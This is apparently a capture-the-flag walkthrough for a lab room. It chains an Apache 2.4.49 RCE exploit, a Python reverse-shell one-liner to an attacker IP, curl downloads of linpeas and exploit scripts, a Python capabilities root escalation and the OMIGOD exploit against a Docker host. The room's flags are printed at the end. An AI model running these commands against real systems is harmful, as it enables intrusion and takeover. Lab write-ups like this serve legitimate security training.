nmap -T4 -p- -A -Pn -v 10.10.174.97
#apache 2.4.49 exploit
python3 CVE-2021-41773.py -t 10.10.174.97
#gives limited shell
#setup another listener in new tab
nc -nvlp 4444
#in limited shell
#run python reverse-shell command
export RHOST="10.14.31.212";export RPORT=4444;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'
#we get shell on our listener
whoami
#daemon
python3 -c 'import pty;pty.spawn("/bin/bash")'
#we can check directories such as /opt, /var/www, /home
#but we do not get anything
#in attacker machine
python3 -m http.server
#in reverse shell
cd /tmp
#we do not have wget, we can use curl
curl http://10.14.31.212:8000/linpeas.sh --output linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
#this shows python has capabilities set
#confirm using getcap command
getcap -r / 2>/dev/null
#exploit from GTFObins
/usr/bin/python3.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'
#we have root shell now
id
#root
ls -la /root
#this has user flag
cat /root/user.txt
#we now need to check root flag
find / -name root.txt 2>/dev/null
#we do not get root flag
#.dockerenv in /
#random hostname
ifconfig
#and ip is 172.17.0.2
#this shows we are in docker environment
#we can scan adjacent machine 172.17.0.1
#for open ports using nmap
#get nmap static binary from attacker machine
curl http://10.14.31.212:8000/nmap --output nmap
chmod +x nmap
./nmap -T4 -p- 172.17.0.1
#shows closed port 5985 and open port 5986
#googling these show 'omigod' exploit
#cve-2021-38647 exploit from github
curl http://10.14.31.212:8000/CVE-2021-38647.py --output cve.py
/usr/bin/python3 cve.py -t 172.17.0.1 -p 5986 -c id
/usr/bin/python3 cve.py -t 172.17.0.1 -p 5986 -c 'find / -name root.txt 2>/dev/null'
#root flag
/usr/bin/python3 cve.py -t 172.17.0.1 -p 5986 -c 'cat /root/root.txt'-
Open ports & services:
- 22 - ssh - OpenSSH 8.2p1 (Ubuntu)
- 80 - http - Apache httpd 2.4.49
-
Basic enumeration shows that the version of Apache webserver is 2.4.49.
-
When Googled, we find out that this version has a RCE exploit associated with it.
-
We can download an exploit from GitHub; running the Python script with the required parameter gets us a limited reverse shell.
-
We can setup another listener, and use a reverse-shell one-liner to migrate our shell to the listener.
-
Now, we have reverse shell as 'daemon' - we need to check for privesc.
-
Using
linpeas.sh, we can see that there are capabilities set for Python 3.7 -
We can confirm this using the
getcapcommand. -
GTFObins has a neat exploit for set capabilities in Python - we use that to get shell as root.
-
Now, as this is a web server, there are no users in home directory.
-
Checking the root folder gives us the user flag.
-
Now, there is a
.dockerenvfile in root directory; furthermore,ifconfigshows our IP is 172.17.0.2, and finally we have a random string as hostname. -
These three indicators show that we are in a Docker environment - we now need to check for ways to escape this.
-
We can upload a static binary of
nmapto victim machine and check for open ports. -
Running the scan against all ports shows that port 5985 is closed and 5986 is open.
-
Googling '5986 port open docker' leads us to 'OMIGOD' exploit, known by CVE-2021-38647.
-
This has a Python script for exploitation - we can download it from GitHub and upload it to victim machine.
-
Running this script with the required parameters, we can search for the root flag, and print it.
1. What is the user flag? - THM{eacffefe1d2aafcc15e70dc2f07f7ac1}
2. What is the root flag? - THM{7f147ef1f36da9ae29529890a1b6011f}